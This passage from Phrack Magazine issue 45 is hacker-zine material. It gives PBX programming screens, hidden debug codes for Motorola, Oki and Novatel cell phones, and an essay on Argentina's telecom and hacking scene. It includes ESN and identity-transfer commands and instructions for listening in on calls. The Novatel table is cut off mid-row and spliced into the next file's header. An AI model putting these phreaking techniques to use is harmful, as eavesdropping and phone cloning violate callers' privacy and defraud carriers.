  17472.  
  17473. SYSTEM PARAMETERS MENU
  17474.  
  17475. PRINTER = 1
  17476. PABX    = 2
  17477. REPORT  = 3
  17478. OPTIONS = 4
  17479.  
  17480. SELECT FUNCTION : 2
  17481.  
  17482.  ACCOUNTS      ------TRUNKS------   EXT   ACCESS   TOLL
  17483. SIZE    NO.    NO.   '-'  GRP  EQP SIZE  ABS  COST DIG
  17484.  04    1024    040    N    2    3    3    Y    N    1
  17485.  -+++ FUNCTION CANCELED +++
  17486. <-CTRL Z->
  17487. COMMAND ?10
  17488.  
  17489. SYSTEM PARAMETERS MENU
  17490.  
  17491. PRINTER = 1
  17492. PABX    = 2
  17493. REPORT  = 3
  17494. OPTIONS = 4
  17495.  
  17496. SELECT FUNCTION : 3
  17497.  
  17498. CALL   ----DROP OR REJECT---  AUTO  TO-  LIST
  17499. GRACE LOC  ACT  INC  TRK  EXT  PRD  DAY  NULL
  17500.  05    N    N    N    N    N    0    Y    N
  17501.  -+++ FUNCTION CANCELED +++
  17502. <-CTRL Z->
  17503. COMMAND ?10
  17504.  
  17505. SYSTEM PARAMETERS MENU
  17506.  
  17507. PRINTER = 1
  17508. PABX    = 2
  17509. REPORT  = 3
  17510. OPTIONS = 4
  17511.  
  17512. SELECT FUNCTION : 4
  17513.  
  17514. SER  PC   ZERO
  17515. IAL  PORT  OPR
  17516.  Y    Y    Y
  17517.  -+++ FUNCTION CANCELED +++
  17518. <-CTRL Z->
  17519. COMMAND ?00 <<00 terminate programming>>
  17520.  
  17521.  
  17522.  
  17523.  
  17524. ******************************************************************************
  17525. <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
  17526.  
  17527. Ending notes:
  17528. -------------
  17529. I've had this system laying around for the past 2 years and never gave a
  17530. flying fuck about it, yet when I find new systems I am unfamiliar with I
  17531. always wonder why the hell no one writes a phile on 'em to pass on the
  17532. knowledge.
  17533.  
  17534. Anyway, to all who have hacked not-so-well-known systems, or even something
  17535. you consider lame, WRITE A PHILE ON IT!!  If enough people start doing this,
  17536. a newz letter could be started.. call it LSD (Lame Systemz Digest) or
  17537. something.  Woa, what a concept!
  17538.  
  17539.  
  17540.             ++++++ Quantula Sapientia Regitur Mundus ! ++++++
  17541.        (What little wisdom is shown in the government of the world)
  17542.  
  17543.  
  17544.  
  17545. Greetz 2:
  17546. ---------
  17547. Kaleidox, Garbage Heap & P/S, Night Ranger, Con Artist, Green Hell,
  17548. Maldoror (The OLD Hannibal), Citizen-One, Speed Demon, The Pyrotechnic,
  17549. Knight Lightning, King Cobra, Death Wish, Shadow Runner, Axiom Codex,
  17550. Phunatic Phreak, and all the other K-rad people I forgot to mention.
  17551.  
  17552. <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
  17553. ******************************************************************************
  17554.                               ==Phrack Magazine==
  17555.  
  17556.                  Volume Five, Issue Forty-Five, File 26 of 28
  17557.  
  17558. ******************************************************************************
  17559.  
  17560.                           Cellular Debug Mode Commands
  17561.  
  17562.  
  17563. **************************************
  17564.  
  17565.  Motorola test mode programing codes
  17566.         for most motorola phones
  17567.  
  17568. **************************************
  17569.  
  17570. 01# Restart (re-enter DC power start-up
  17571.     routine)
  17572.  
  17573. 02# Display Current Telephone Status
  17574.  
  17575. 04# Initializes Telephone to Std.
  17576.     Default Conditions
  17577.  
  17578. 05# TX Carrier On (key transmitter)
  17579.  
  17580. 06# TX Carrier Off
  17581.  
  17582. 07# RX Off (mute receiver audio)
  17583.  
  17584. 08# RX Audio On (unmute receiver audio)
  17585.  
  17586. 09# TX Audio Off
  17587.  
  17588. 10# TX Audio On
  17589.  
  17590. 11(ch.no.)# Set Transceiver to channel
  17591.     (RX & TX)
  17592.  
  17593. 12# Set power level
  17594.  
  17595. 13# Power Off
  17596.  
  17597. 14# 10 khz Signalling Tone On
  17598.  
  17599. 15# 10 khz Signalling Tone Off
  17600.  
  17601. 16# Setup (Transmits a five word RECC
  17602.     message)
  17603.  
  17604. 17# Voice (Transmits a two word REVC
  17605.     message)
  17606.  
  17607. 18# C-SCAN
  17608.  
  17609. 19# Display Software Version Number
  17610.     (year & week)
  17611.  
  17612. 25# SAT On
  17613.  
  17614. 26# SAT Off
  17615.  
  17616. 27# Transmit Data (TX continuous
  17617.     control channel data)
  17618.  
  17619. 32# Clear (clears non-volatile memory)
  17620.  
  17621. 33# Turn DTMF on
  17622.  
  17623. 34# Turn DTMF off
  17624.  
  17625. 35# Display RSSI ("D" series portable
  17626.     only)
  17627.  
  17628. 35# Set Audio path
  17629.  
  17630. 38# Display ESN (displays ESN in four
  17631.     steps, hit * till back at start)
  17632.  
  17633. 39# Compander On
  17634.  
  17635. 41# Enables Diversity
  17636.  
  17637. 42#,43#,44# Disable Diversity
  17638.      (different models use different
  17639.       codez)
  17640.  
  17641. 45# Display Current RSSI
  17642.  
  17643. 46# Display Cumulative Call Timer
  17644.  
  17645. 47# Set Audio level
  17646.  
  17647. 48# Side Tone On
  17648.  
  17649. 49# Side Tone Off
  17650.  
  17651. 55# Display and or program NAM (test
  17652.     mode programing)
  17653.  
  17654. 58# Compander On
  17655.  
  17656. 59# Compander Off
  17657.  
  17658. 61# ESN Transfer (for series I and Mini
  17659.     T.A.C's)
  17660.  
  17661. 62# Turn On Ringer
  17662.  
  17663. 63# Turn Off Ringer
  17664.  
  17665. 66# Identity Transfer (series II and
  17666.     some current portables)
  17667.  
  17668. 68# Display FLEX and Model info
  17669.  
  17670. 69# Used with Identity Transfer
  17671.  
  17672. ***************************************
  17673. ***************************************
  17674.  
  17675. 1. Entering test mode on 25 pin
  17676.    transceivers is as follows:
  17677.  
  17678.    for F19ATA or F19CTA ground pin 11
  17679.        and power-up phone,
  17680.    for DMT/Mini T.A.C series I, II,
  17681.        III ground pin 21 and power-up
  17682.        phone.
  17683.  
  17684. 2. Entering test mode on OEM 32 pin
  17685.    transceivers is as follows:
  17686.  
  17687.      ground pin 9 and power-up phone.
  17688.  
  17689. 3. Entering test mode on portable
  17690.    phones is as follows:
  17691.  
  17692.      ground pin 6 and power-up phone.
  17693.  
  17694. 4. Entering test mode on Micro T.A.C's
  17695.    phones is as follows:
  17696.  
  17697.      ground pin 2 and power-up phone.
  17698.  
  17699. ------------------------------------------------------------------------------
  17700.  
  17701. Oki Debug Commands - Good Timing
  17702. From Nuts & Volts Dec. 1993
  17703.  
  17704. To Enter Debug Mode:
  17705.  
  17706. Press 7 & 9 Together
  17707. then press MENU, SEND, END, RCL, STO and CLR
  17708. then press 1 & 3 together
  17709.  
  17710. Commands:
  17711.  
  17712. #01     Suspend         Performs Initialization
  17713. #02     Restart         Terminates the test mode
  17714. #03     Status          Shows the current status of TRU
  17715. #04     Reset           Resets the timer
  17716. #07     Carrier On      Turns the carrier on
  17717. #08     Carrier Off     Turns off the carrier
  17718. #09XXXX Load Synth      Sets the synthesizer to channel XXXX
  17719. #10X    Set Attn        Sets the RF power attenuation to X
  17720. #11     RX Mute         Mutes the receive audio
  17721. #12     RX Unmute       Unmute the receive audio
  17722. #13     TX Mute         Mutes the transmit audio
  17723. #14     TX Unmute       Unmutes the transmit audio
  17724. #16     ST On           Transmits a signalling tone
  17725. #17     ST Off          Turns off the signalling tone
  17726. #18     Setup           Transmits a 5 word RCC message
  17727. #19     Voice           Transmits a 2 word RVC message
  17728. #20     Rcv SU          Receives a 2 word FCC message
  17729. #21     Rcv VC          Receives a 1 word FVC message
  17730. #22     Send NAM        Returns the information contained in the NAM
  17731. #23     Version         Displays the TRU software version
  17732. #24     Send SN         Displays the ESN
  17733. #25XXXX Mem             Displays the resident memory data at XXXX
  17734. #28     WSTS            Receive 1 word messages on CC until #56/CLR
  17735. #29     WSTV            Receive 1 word messages on VC until #56/CLR
  17736. #32X    SAT On          Enables the transmission of SAT X
  17737. #33     SAT Off         Disables the transmission of SAT
  17738. #35     Hi TN On        Activates the 1150 Hz tone to receive audio line
  17739. #36     Hi TN Off       Deactivates the 1150 Hz tone
  17740. #37     Lo TN On        Activates the 770 Hz tone to receive audio line
  17741. #38     Lo TN Off       Deactivates the 770 Hz tone
  17742. #42XX   DTMF On         Enables the transmission of DTMF frequency XX
  17743. #43     DTMF Off        Disables the transmission of DTMF
  17744.  
  17745. ------------------------------------------------------------------------------
  17746.  
  17747. Novatel 8325
  17748. ------------
  17749.  
  17750. This article is copyright 1993 by the author. Reproduction is allowed, with the
  17751. following restrictions:
  17752.  
  17753. 1) Any copy, or edited version, of this file must contain this copyright
  17754.    notice, the author's name, and the information regarding Phrack.
  17755. 2) No commercial use may be made of it without prior permission of the author.
  17756.    This permission may be revoked at any time, in which case all reproduction
  17757.    must cease, and any copies must be destroyed.
  17758. 3) Use as evidence in a court of law, for the purposes of this agreement,
  17759.    is considered a commercial use.
  17760. 4) This agreement can not be changed, or added to in any way. Receipt of this
  17761.    work through an authorized commercial distributor does not imply permission
  17762.    given to the commercial consumer to re-distribute it in a commercial manner.
  17763. 5) Any part of this agreement found invalid by a court of law does not render
  17764.    the remainder of this agreement void: The rest of the terms of the agreement
  17765.    must still be adhered to.
  17766.  
  17767.  
  17768. The Novatel 8325 is a bag-style portable cellular telephone. It is known as a
  17769. 'ProClassic' in Novatel MarketSpeak. Two different handsets (control units) are
  17770. used with the 8325 transceiver: the 4130 and 5160. My phone has the 5160.
  17771. The handsets appear very similar: I doubt there is any functional difference
  17772. between them. Earlier transceivers, such as the 8320, contain many of the same
  17773. features as the 8325, though the hidden menus are accessed with different
  17774. codes. The only other code I know of is #746, which is the code for the 8320
  17775. CFG menu.
  17776.  
  17777. Terms: Throughout this article, I will refer to things without explaining them
  17778. each time. If you get lost, refer to the table below.
  17779.  
  17780. NORMAL = the phone is in this mode when it is not locked, or in either of the
  17781. hidden menus, or in the 'user' menus accessed by the MENU key. The screen will
  17782. display either READY or SCANNING when in normal mode. This is the mode the phone
  17783. is in when it is first turned on.
  17784.  
  17785. LOCKED = when the phone displays LOCKED, a code must be typed to enter normal
  17786. mode. The default code is 1234. The telephone can be locked using [FCN] 1 [SND]
  17787. from normal mode. The phone must be locked before entering in any of the codes
  17788. to access the hidden menus described below.
  17789.  
  17790. TBL = troubleshooting mode = the hidden menu accessed with 546*. This is a
  17791. menu supposedly know only to Novatel, not even their dealers are supposed to
  17792. know about it. According to Novatel, some of the features in this menu could
  17793. destroy the phone if improperly set. Scare tactics? You decide.
  17794.  
  17795. CFG = configuration mode = the hidden menu accessed with 510*. This is used by
  17796. dealers to set up a subscriber's service. As far as I know, there is nothing
  17797. particularly dangerous about this mode, but Novatel is touchy about it
  17798. nonetheless. I take no responsibility for any damages.
  17799.  
  17800.  
  17801. Troubleshooting Mode - TBL
  17802.  
  17803. First, lock phone with [FCN] 1 [SND]
  17804. Then, enter 546* on the keypad. The phone
  17805. will not make tones for each key pressed.
  17806.  
  17807. TBL 8325    /___ This is what shows up on my phone.
  17808. REV NA0C    \    Yours may be different.
  17809.  
  17810. You are now in troubleshooting mode. You may page through the functions
  17811. by using the arrow keys, or access the functions by number, by hitting #
  17812. (The screen will display DIR PAGE ACCESS) and then the function number,
  17813. from the chart below. Note that on initially entering Troubleshooting mode,
  17814. you are on function 37. Toggle with the [SND] key, unless otherwise noted.
  17815.  
  17816. #    Screen       Default   Toggle/Range       Description
  17817. -----------------------------------------------------------------------------
  17818. 11   TRANSMIT     OFF       ON   Turn the transmitter on.
  17819. 12   TX TEST      OFF       [CLR]=OFF, 0-7 test data stream, audio levels of
  17820. 13   CHANNEL      0000      0000-1023    [H/F] = down, [RCL] = up.
  17821. 14   TX AUDIO     OFF       ON
  17822. 15   VOLUME GAIN  6         0-7
  17823. 16   RX AUDIO     OFF       ON   Turn the receiver on. Set this to ON
  17824.                                  and use in conjunction with #13
  17825.                                  (CHANNEL) to listen to calls.
  17826. 17   POWER ATTN   3         0-7
  17827. 18   SYNTH LOCKED                       synthesizer locked. if reads
  17828.                                         unlocked,  the phone has real problems.
  17829. 19   SAT OFF      ??                    transmitted SAT
  17830. 20   RF POWER     OFF       ON          Not an option, but an indicator. When
  17831.                                         TRANSMIT is set ON, this displays ON.
  17832. 21   SPEAKER      ON        OFF
  17833. 22   SIDE TONE    ON        OFF
  17834. 23   TX DTMF      OFF        Tone test. [CLR] then 00-25. DTMF means touch-tone
  17835.                  00 = DTMF 1     01 = DTMF 2      02 = DTMF 3     03 = DTMF A?
  17836.                  04 = DTMF 4     05 = DTMF 5      06 = DTMF 6     07 = DTMF B?
  17837.                  08 = DTMF 7     09 = DTMF 8      10 = DTMF 9     11 = DTMF C?
  17838.                  12 = DTMF *     13 = DTMF 0      14 = DTMF #     15 = DTMF D?
  17839.                  16 = 1+2+3      17 = 4+5+6       18 = 7+8+9      19 = *+0+#
  17840.                  20 = 1+4+7+#    21 = 2+5+8+0     22 = 3+6+9+#    23 = A+B+C+D?
  17841.                  24 = ?          25 = Wake-up-tone. The + signs are use to
  17842.                  signify keys simultaneously held on a regular (desk-style)
  17843.                  touch-tone phone. These tones are each half of the dual tones
  17844.                  the comprise touch tones.
  17845. 24   RX MODE      BURST     CONT
  17846. 25   RX TEST      OFF       ON
  17847. 26   FRME CNT     000000   Frame count.  (of counter)
  17848.  
  17849. 27   BIT ERR      0000000   Bit Error.   every so often is no big
  17850.                                          deal. Hit any key to clear.
  17851. 28   WATCHDOG     ON        OFF          watch-dog periodically checks the
  17852.                                          timing of the different clocks
  17853.                                          in the system.  Hit any key to turn
  17854.                                          this off and the Phone re-starts
  17855. 29   HOOK SW      OFF                    Hook Switch - since a bag phone has
  17856.                                          no switch hook, always off.
  17857. 30   HORN MODE    ON        OFF          Toggles indicator light
  17858. 31   BELL MODE    0         0-9, [SND]
  17859. 32   RSST         20x                    Received Signal Strength Indicator
  17860. 33   MICROPHN     ENABLED   DISABLED
  17861. 34   NVM TEST     RM=0 E=1               Non-Volatile Memory Test
  17862. 35   COMPANDR     ON        OFF          A Compander compresses speech to
  17863.                                          confine energy to the given bandwidth.
  17864. 36   NVM CLR      USE SND                Non-Volatile Memory [SND]="ACCESS
  17865.                                          DENIED"
  17866. 37   TBL 8325     REV NA0C               MENU,MODEL,REVISION (INITAL SCREEN)
  17867. ------Modulation------- Don't mess with this stuff - it can screw up your phone
  17868.  N0 means channel bank 0. Banks are 0-4. Tune to a mid-band channel using the
  17869.  keypad, and tune with [H/F] down and [RCL] for up.
  17870. 38   MODG CLR     Any Key, 0 = YES        resets options #39,#40,#41 to default.
  17871. 39   CHN 0991     N0 AMG16  AMG = SAD Deviation.
  17872. 40   CHN 0991     N0 DMG16  DMG = Signalling tone.
  17873. 41   CHN 0991     N0 SMG12  SMG = Transmit audio level.
  17874. ------Digital Potentiometers-- DANGER! Play with this, and you may have to
  17875.                                send your phone out for repair.
  17876. 42   DPOT CLR     Any Key, 0 = YES   resets options #43,#44,#45,#46 to default
  17877. 43   MICROPHN     14190 OHM
  17878. 44   EXPANDER     14936 OHM
  17879. 45   TX LIMIT     12180 OHM
  17880. 46   SPEAKER      15420 OHM
  17881. ------Analog Switches-------- Enables/Disables on-board potentiometers.
  17882. 47   ANALOG SW1   ON         High end of transmit audio
  17883. 48   ANALOG SW2   OFF        Low end of transmit audio
  17884. -----
  17885. 49   PWR LVL3     DAC0777     power level, reading from digital-analog converter
  17886. 50   PL3@0000     14          power level @ channel, received signal strength                              ==Phrack Magazine==
  17887.  
  17888.                  Volume Five, Issue Forty-Five, File 27 of 28
  17889.  
  17890. ****************************************************************************
  17891.  
  17892.                              International Scenes
  17893.  
  17894. There was once a time when hackers were basically isolated.  It was
  17895. almost unheard of to run into hackers from countries other than the
  17896. United States.  Then in the mid 1980's thanks largely to the
  17897. existence of chat systems accessible through X.25 networks like
  17898. Altger, tchh and QSD, hackers world-wide began to run into each other.
  17899. They began to talk, trade information, and learn from each other.
  17900. Separate and diverse subcultures began to merge into one collective
  17901. scene and has brought us the hacking subculture we know today.  A
  17902. subculture that knows no borders, one whose denizens share the common goal
  17903. of liberating information from its corporate shackles.
  17904.  
  17905. With the incredible proliferation of the Internet around the globe, this
  17906. group is growing by leaps and bounds.  With this in mind, we want to help
  17907. further unite the communities in various countries by shedding light
  17908. onto the hacking scenes that exist there.  If you want to contribute a
  17909. file about the hacking scene in your country, please send it to us
  17910. at phrack@well.com.
  17911.  
  17912. This month we have files about the scenes in Argentina, Australia and Greece.
  17913.  
  17914. ________________________________________________________________________________
  17915.  
  17916.  
  17917.                 Argentina: Hacking at the ass of the world
  17918.                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  17919.                                by: OPii.
  17920.  
  17921.   Yeah, i know, it's something you just can't stop, whenever you try to sleep
  17922.   that recurrent idea comes and recurses through your very brain, you are
  17923.   blind, it happens to be worse than MTV, you just can't get to sleep, you stay
  17924.   up for hours, you forget to feed yourself, you can't even remember your name,
  17925.   you turn catatonic, you stand still stretching every nerve and mumbling
  17926.   "hhmmpff..sc.eenn...arghh..teennn..ahhh..." and then you explode in a
  17927.   terrifying scream...
  17928.  
  17929.     "ARRRGHHHHHH, WHAT THE FUCK IS GOING ON IN ARGENTINA??????"
  17930.  
  17931.  
  17932.   Right?
  17933.  
  17934.   NO????
  17935.  
  17936.   Well, I never really thought that could happened but I'm gonna answer
  17937.   the question anyway, I know you probably don't give a fuck about Argentina
  17938.   and it's scene but, hey, reading shitty text files is not new to you so
  17939.   you wanna change your habits RIGHT NOW? Nahhhhhhhh
  17940.  
  17941. Introduction
  17942. ~~~~~~~~~~~~
  17943.   Ok, enough is enough, so let's get to the point.
  17944.  
  17945.   Argentina is lagging. While other countries are flying toward the hyper
  17946.   publicized "Data Highway", Argentina is still trying to fork it's path in
  17947.   the telecommunication's jungle. And this has it's pros and cons.
  17948.  
  17949.   Before 1990 the telecommunications in Argentina were in hands of Entel,
  17950.   the government's monopolistic arm that ruled the area. But, and there's always
  17951.   a BUT, the service provided by Entel was worse than bad. For too many
  17952.   people it was normal to wait YEARS for a line, paying $1000+ when they
  17953.   finally got it installed, and then a never-ending nightmare began,
  17954.   if it rained, the line went dead, if it didn't die it went crazy, you
  17955.   could pick up the phone and listen to your favorite radio station but
  17956.   of course you could not call anyone. Or you could had bizarre conferences
  17957.   with persons you'd never met...it was basically POTS but with features
  17958.   that Entel never thought about... N-way calling, call forwarding to hell,
  17959.   continuous call waiting in the form of line noise, speed dialing to always
  17960.   busy DNs...
  17961.  
  17962.   Ahh, you could get a line in less than a month if you paid the $1000
  17963.   to some bogus vapor-companies whose workers would came pulling loops out
  17964.   of their sleeves and installing them quietly (yeah, all completely illegal),
  17965.   these companies were known as the phone mob.
  17966.   Remember, Entel was the ONLY company entitled to give you not only a phone
  17967.   line but the phone itself.
  17968.  
  17969.   And the bills... the bills always had an encrypted message in them, you needed
  17970.   a PhD in Black Magic in order to decipher what the fuck the telco was
  17971.   charging you... but for most mortals the meaning was only one:
  17972.   PAY, pay whatever we order you to pay, and don't ask why.
  17973.  
  17974.   You made only local calls? PAY! (local calls are not free in Argentina)
  17975.   You didn't make that call to Nairobi, Kenya? PAY!
  17976.   Ohh, but you cant dial outside the country with your line? PAY ANYWAY!
  17977.   You want to complain? PAY FIRST!
  17978.  
  17979.   In 1990 the government decided to split Entel in two companies and sell them
  17980.   to private investors, each company would service either the northern or
  17981.   southern Argentina, the border being Buenos Aires' downtown (in case you
  17982.   don't know Buenos Aires is the capital of Argentina).
  17983.  
  17984.   This was nothing more than giving the monopolistic Entel to two new
  17985.   monopolistic companies as we will see.
  17986.  
  17987.   So the government sold Entel and two new companies appeared in Argentina's
  17988.   communications scene:
  17989.  
  17990.  - Telefonica de Argentina. Servicing the southern part of Argentina, this
  17991.    company is formed by the Spanish Telefonica de Espa§a (owned by Spanish gov.)
  17992.    and several Argentinian and foreign investors.
  17993.  - Telecom Argentina. Services the northern Argentina and it's major
  17994.    stockholders are France Telecom and STET (Italy).
  17995.  
  17996.   Also, another two companies where born:
  17997.  
  17998.  - Telintar. Owned by Telefonica and Telecom. The ONE AND ONLY LD carrier
  17999.    in Argentina.
  18000.  - Startel. Guess who owns it? Yeah, Telefonica and Telecom, with some
  18001.    philanthropic aides like Citicorp, J.P. Morgan and Techint and Perez
  18002.    Companc ( Argentinian megacorps). Startel provides TELEX and data
  18003.    transmission services as well as mobile and sea radio links. It runs
  18004.    the most known Argentinian X.25 PSN (ARPAC).
  18005.  
  18006.   The government however had to assure minimal control of the companies
  18007.   and verify that their procedures and actions conform to the Argentinian
  18008.   laws. That's the duty of the SNC (National Communications Secretary) and
  18009.   the CNT ( National Telecommunications Commission), the last being some
  18010.   sort of mirror image of the American FCC.
  18011.  
  18012.   Did anything changed with the appearance of Telefonica and Telecom?
  18013.   Did the customers noticed an improvement in the phone service?
  18014.  
  18015.   Both companies began to "correct" Entel's mess rapidly but personally
  18016.   I consider it was a little more than nothing for the customer.
  18017.   They did change loops, trunks, switches, added features, installed
  18018.   inter-office fiber links, private PSNs and more. But, it's 1994
  18019.   now, and I still know zillions of persons that had their line dead
  18020.   for 4-5 months, or have been visiting the telco offices everyday
  18021.   during a month complaining about line_noise/no_dial_tone/
  18022.   dial_tone_but_no_dialing/cant_receive_calls/cant_dial_certain_NPAs/
  18023.   bills_are_way_out_of_scope/etc.
  18024.  
  18025.   To conclude this section I will only say that:
  18026.  
  18027.    1). There's still a telecom. monopoly in Argentina, now in the form
  18028.        of two private companies.
  18029.    2). Service got better but it's still a mess, dirty and expensive.
  18030.    3). Both companies enjoyed an explosive economic grow since 1990, their
  18031.        shares being one of the best things you could get a hold of in the
  18032.        stock exchange.
  18033.  
  18034. The Phony Phone System
  18035. ~~~~~~~~~~~~~~~~~~~~~~
  18036.  
  18037.   Argentina uses pulse dialing, except for those lucky persons that
  18038.   have the latest installed switches in their COs. If you don't have
  18039.   DTMF you HAVE TO ask for it, you can do this dialing 112 (Telecom)
  18040.   or visiting the office (Telefonica and/or Telecom). Someone will
  18041.   eventually listen to you and answer:
  18042.     1) "Uh???? What's DTMF?" - Forget it, ever considered teaching algebra
  18043.                                to a chimpanzee?
  18044.     2) "I'm sorry you can't dial MF with that line" - No luck
  18045.     3) "Not a problem, we'll set it for MF"         - You bastard!
  18046.  
  18047.  
  18048.   Switches are Step by Step or Crossbars but since 1990 the number of
  18049.   electronic, and specially, digital switches has increased constantly.
  18050.   Both, Telecom and Telefonica, use equipment from many different
  18051.   vendors: Siemmens, Ericsson, Hitachi, Fujitsu, Northern Telecom, AT&T,
  18052.   Alcatel, NEC, Spanish companies, Italians, Norwegians, and God only knows
  18053.   what else. Most switches are either European or Japanesse.
  18054.   As for PBXs, Siemmens, Ericsson and Fujitsu are the brands of choice for
  18055.   most companies, with the recent grow of NT's Meridians among large
  18056.   corporations.
  18057.  
  18058.   DNs are 7 digits but still 6 digits in low line density locations,
  18059.   this includes certain areas in Buenos Aires, the capital. Generally, 6
  18060.   digit DNs can't complete an international call for themselves, they need
  18061.   operator assistance ( DDI is the "feature" that allows a subscriber
  18062.   to make international calls without operator's assistance, geez). Other
  18063.   features offered are 3-way, conference, call forwarding, call waiting
  18064.   (can't be fucking disabled temporarily!) and more. Telecom also offers a
  18065.   service called "Factel"  which is a detailed list of all the calls you made
  18066.   in a billing period  (2 months), this comes  with your bills and they
  18067.   charge you for EACH PAGE.
  18068.  
  18069.   LOCAL CALLS ARE *NOT* FREE.
  18070.  
  18071.   Toll free numbers (800) where introduced two years ago but so far there are
  18072.   few 800s to call, one of the few is the CNT's 800 for reception of
  18073.   complains about the telco's service.
  18074.  
  18075.   Both Telefonica and Telecom use Frecuency Division Multiplexing (FDM) or
  18076.   Time Division Multiplexing (TDM) for grouping channels with a bandwidth
  18077.   of 4KHz into a multiplexed signal, called Base Band, of several channels.
  18078.   Analog and digital multiplexing is used depending on the equipment
  18079.   installed.
  18080.  
  18081.   The hierarchy of groups is as follows:
  18082.  
  18083.   - Primary Group or Basic Group: 12 4KHz channels for a total bandwidth of
  18084.     48Khz, generally placed in the 60-108 KHz space.
  18085.     There are three ways for forming a Basic Group: Direct Modulation,
  18086.     Pre-group Modulation or Premodulation, I won't discuss 'em in this
  18087.     article.
  18088.   - Secondary Group (aka Super Group): 5 Primary Groups (PG) for a total of
  18089.     12x5 = 60  channels and a 240KHz bandwidth., placed in 312-552KHz band
  18090.   - Master Group (MG): 5 SGs, 60x5 = 300 channels, 1232 Khz. bandwidth
  18091.     ( 5x240Khz + 32Khz.) in the 812-2044Khz. band
  18092.   - Super Master Group (SMG):
  18093.       3MGs, 3x300 = 900 channels
  18094.       3 x 1232Khz + 176  Khz = 3872 KHz bandwidth. (8516-12388 KHz)
  18095.  
  18096.   For digital multiplexing, using TDM, things are like this:
  18097.   Pulse amplitude modulation (PAM) is first used to sample the 4Khz
  18098.   channel, then the PAM signal is quantified in 256 discrete values
  18099.   ( 8 bits) and this is finally multiplexed as follows:
  18100.  
  18101.   -   A basic 2048 Mbit/s for 30 channels  (8Khz/channel for they're sampled...)
  18102.   -   8 Mbit/s = 4x2Mbit/s   (  120 channels)
  18103.   -  34 Mbit/s = 4x8Mbit/s   (  480 channels)
  18104.   -  52 Mbit/s = 6x8Mbit/s   (  720 channels) <--this is not standard)
  18105.   - 140 Mbit/s = 4x34Mbit/s  ( 1920 channels)
  18106.   - 565 Mbit/s = 4x140Mbit/s ( 7680 channels)
  18107.   - 900 Mbit/s = 6x140Mbit/s (11.520 channels)
  18108.  
  18109.  Both DC and AC is used for signalling depending on several characteristics
  18110.  as trunk length, the switch's technology, etc.
  18111.  Reverse polarity and E and M signalling is used with DC, while DP
  18112.  and MF is used with AC. CCITT #3,CCITT #4 or CCITT #5 is used
  18113.  on international circuits, otherwise R2 is used.
  18114.  I won't go into the details of the different in band signalling methods as they
  18115.  are probably well known by you... i'll only point that, as you guessed,
  18116.  things are set for interesting boxing experiences.
  18117.  Argentina is the place for the casual explorer in this topic, even "Joe
  18118.  customer" could choose alternate routes for his local calls, all by
  18119.  himself, some years ago, prefixing the destination DN with a 3 digit number.
  18120.  There are other interesting things to ponder here, like the way calls
  18121.  from one company's zone to the other company's zone are completed, etc.
  18122.  Also, SxS and Xbar switches are fun to mess with, known their "hidden
  18123.  features" like line freezing, forced ANIF and forced linkage of the
  18124.  circuit to a given CO.
  18125.  
  18126.  Payphones, known as TPAs in local telco. jargon, comes in different
  18127.  flavors. First, the one that both companies inherited from their
  18128.  predecessor, Entel, this one sports a rotary dial and needs tokens to
  18129.  operate.
  18130.  
  18131.  Then the obsoleted Telecom's "card puncher", needed a card with a mag
  18132.  strip that the phone would punch each time you used it, these have been
  18133.  replaced by the new Telecom's modular payphone. (Perhaps it was a piece of
  18134.  shit and Telecom replaced them right away??? ). You wont find one of these
  18135.  easily.
  18136.  
  18137.  Telecom's modular payphone works with cards and wont accept tokens or
  18138.  coins, these have a cute LCD and controls for volume, language selection
  18139.  of the messages displayed as well as buttons for redialing and replacing
  18140.  an exhausted card while a call is in progress. It's uses cards with an
  18141.  8 contacts on-card chip.
  18142.  
  18143.  Telefonica's payphones accept cards AND tokens, they also have a LCD
  18144.  and buttons for volume, redial, etc. They also use cards with 8 contacts
  18145.  on-card chip. They skipped the "brilliant" card punching stage so these are the
  18146.  phones you'll find in Telefonica's area.
  18147.  
  18148.  NO PAYPHONE WILL ACCEPT REGULAR CREDIT CARDS.
  18149.  ONE COMPANY'S PHONE CARD IS INCOMPATIBLE WITH THE OTHER COMPANY'S PHONES.
  18150.   ( this is supposed the change this year? )
  18151.  Phone cards cant be recharged when they're exhausted.
  18152.   ( eh, this is not quite true )
  18153.  Telefonica is said to make their payphones accept regular coins any
  18154.  time noooooooowwwwwwww bahahahahahahah .
  18155.  
  18156. The Networks
  18157. ~~~~~~~~~~~~
  18158.  
  18159.   Networks in Argentina are growing, and are growing fast, but they are
  18160.   still poor and slow when compared to other countries nets.
  18161.   LAN are usually based on PCs with Novell's Netware in its different
  18162.   flavors or some lousy Lantastic.
  18163.   As for WANs, the computers you'll ran into are IBM mainframes, DEC
  18164.   VAXes running VMS, and Unixes (generally IBM's RS/6000 w/AIX or lower
  18165.   end PC clones running SCO).
  18166.   Still, open systems are being happily adopted and TCP/IP based LANs are
  18167.   emerging everyday.
  18168.   There aren't many systems online 24hrs/day but mostly online during work
  18169.   hours. You'll find most systems unreliable, bad configured, and worse
  18170.   used.
  18171.  
  18172.   ARPAC, The Jester's Playground
  18173.   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18174.      ARPAC (DNIC==7222) is the most known PSN in Argentina. It has dialup
  18175.      access in more than 30 cities in the country, although the fastest
  18176.      baud rate for them is an infamous 2400bds.  Leased lines go
  18177.      up to a maximum of 19.2Kbds.
  18178.      The protocol used is the X.25 suite and ARPAC offers the following
  18179.      optional facilities:
  18180.      - Closed User Group. (CUG)
  18181.      - Fast Select.
  18182.      - Packet size negotiation.
  18183.      - One-way logical channels. (outgoing/incoming).
  18184.      - Non-standard window sizes.
  18185.      - Reverse charge request and acceptance.
  18186.      - Multipoint access
  18187.      - Incoming/outgoing call blocking.
  18188.      - Incoming/outgoing call blocking to and from CUGs.
  18189.  
  18190.      Obviously these features, should you accept them, imply a little
  18191.      extra bucks in your Arpac bill (which will self-destroy your wallet in
  18192.      five secs.).
  18193.      Startel, the company that runs ARPAC, uses a unit called PTD (it stands
  18194.      for Data Transmission Packet in Spanish) for billing purposes.
  18195.      Packets are 128 bytes and conform a PTD, transmission of 64 bytes or
  18196.      less are considered as 1/2 PTD.
  18197.      Startel vacuum cleans it's customers bank accounts this way:
  18198.      1) A one time payment for the installation of the X.25 equipment.
  18199.      2) A "basic monthly payment" that does not include data traffic.
  18200.      3) A "variable monthly payment" that depends on the number of PTDs
  18201.         handled by Arpac.
  18202.  
